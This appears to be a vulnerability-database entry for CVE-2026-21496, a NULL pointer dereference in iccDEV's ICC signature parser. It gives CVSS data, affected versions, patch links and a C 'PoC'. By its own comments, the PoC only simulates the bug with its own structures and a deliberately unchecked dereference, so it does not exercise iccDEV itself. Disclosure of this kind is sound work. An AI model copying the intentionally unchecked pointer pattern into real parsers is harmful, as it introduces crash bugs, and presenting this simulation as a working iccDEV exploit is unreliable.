Security Vulnerability Report
CVE-2026-21496 CVSS 5.5 MEDIUM

Published: 2026-01-07 18:15:53
Last Modified: 2026-01-09 21:56:49

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-21496 PoC - NULL Pointer Dereference in iccDEV Signature Parser
// This stand-alone PoC simulates the NULL pointer dereference with its own
// structures; it does not call iccDEV code.
// Author: Security Researcher
// Date: 2026-01-07
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simulated ICC signature structure
typedef struct {
    char signature[4];
    void* next_tag; // NULL pointer triggers vulnerability
} ICC_SignatureTag;

// Vulnerable function - signature parser
void parse_icc_signature(ICC_SignatureTag* tag) {
    // Check if signature matches expected value
    if (memcmp(tag->signature, "sf32", 4) == 0) {
        // signature is not NUL-terminated, so the print is bounded to 4 bytes
        printf("Processing tag: %.4s\n", tag->signature);
        // VULNERABLE: Dereferencing potentially NULL pointer without check
        // This will cause NULL pointer dereference if next_tag is NULL
        int result = ((ICC_SignatureTag*)tag->next_tag)->signature[0];
        printf("Next tag signature: %c\n", result);
    }
}

// Function to create malicious ICC profile
ICC_SignatureTag* create_malicious_tag(void) {
    ICC_SignatureTag* tag = (ICC_SignatureTag*)malloc(sizeof(ICC_SignatureTag));
    if (tag == NULL) {
        return NULL;
    }
    // Set malicious signature
    memcpy(tag->signature, "sf32", 4);
    // Set next_tag to NULL - triggers vulnerability
    tag->next_tag = NULL;
    return tag;
}

int main(void) {
    printf("CVE-2026-21496 PoC - iccDEV NULL Pointer Dereference\n");
    printf("===================================================\n\n");

    // Create malicious tag
    ICC_SignatureTag* malicious_tag = create_malicious_tag();
    if (malicious_tag != NULL) {
        printf("Created malicious ICC signature tag\n");
        printf("Signature: %.4s\n", malicious_tag->signature);
        printf("next_tag pointer: %p (NULL)\n\n", malicious_tag->next_tag);

        // Trigger vulnerability
        printf("Attempting to parse malicious tag...\n");
        parse_icc_signature(malicious_tag);
        free(malicious_tag);
    }
    return 0;
}

// Usage:
// Compile: gcc -o poc poc.c
// Run: ./poc
// Expected Result: Segmentation fault (NULL pointer dereference)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21496", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:53.300", "lastModified": "2026-01-09T21:56:48.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a una desreferencia de puntero nulo a través del analizador de firmas. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-690"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": 
"https://github.com/InternationalColorConsortium/iccDEV/commit/0e51ceb427925b7e22f0465547df7506d35cda1c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/b5ad23aceece3789bdf1c47bae1ecf9d7bfcd26d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/381", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/405", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wj8m-6w77-r4rw", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}